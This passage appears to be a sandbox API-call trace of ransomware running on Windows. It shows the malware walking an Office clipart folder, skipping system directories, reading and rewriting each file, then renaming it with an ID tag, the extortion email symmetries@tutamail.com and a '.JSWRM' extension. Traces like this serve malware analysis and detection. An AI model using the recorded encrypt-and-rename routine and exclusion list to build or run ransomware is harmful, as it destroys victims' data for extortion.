cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0091.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0091.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0091.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0091.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0091.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0091.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.297] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeaa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00058_.WMF", cAlternateFileName="")) returned 1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2=".") returned 1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="..") returned 1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="...") returned 1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="windows") returned -1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="recovery") returned -1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="perflogs") returned -1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="documents and settings") returned 1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="system volume information") returned -1 [0091.297] lstrcmpiW (lpString1="NA00058_.WMF", lpString2="msocache") returned 1 [0091.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0091.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00058_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00058_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00058_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0091.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0091.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00058_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00058_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00058_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0091.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.299] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3754) returned 1 [0091.299] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x23fc98 [0091.299] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0091.301] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.302] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0091.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.302] CloseHandle (hObject=0x314) returned 1 [0091.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0091.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0091.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0091.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0091.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0091.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.302] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0091.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.303] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1324, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00068_.WMF", cAlternateFileName="")) returned 1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2=".") returned 1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="..") returned 1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="...") returned 1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="windows") returned -1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="recovery") returned -1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="perflogs") returned -1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="documents and settings") returned 1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="system volume information") returned -1 [0091.303] lstrcmpiW (lpString1="NA00068_.WMF", lpString2="msocache") returned 1 [0091.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00068_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00068_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00068_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0091.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00068_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00068_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00068_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0091.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0091.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.304] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4900) returned 1 [0091.304] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1320) returned 0x205850 [0091.304] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1320, lpOverlapped=0x0) returned 1 [0091.306] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.306] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1320, lpOverlapped=0x0) returned 1 [0091.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.306] CloseHandle (hObject=0x314) returned 1 [0091.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0091.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0091.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0091.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0091.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0091.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.307] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0091.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0091.308] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1384, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00238_.WMF", cAlternateFileName="")) returned 1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2=".") returned 1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="..") returned 1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="...") returned 1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="windows") returned -1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="recovery") returned -1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="perflogs") returned -1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="documents and settings") returned 1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="system volume information") returned -1 [0091.308] lstrcmpiW (lpString1="NA00238_.WMF", lpString2="msocache") returned 1 [0091.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00238_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00238_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00238_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0091.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00238_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00238_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00238_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0091.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0091.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.309] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4996) returned 1 [0091.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x205850 [0091.309] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0091.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.311] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0091.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.311] CloseHandle (hObject=0x314) returned 1 [0091.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0091.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0091.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0091.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0091.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0091.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.311] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: 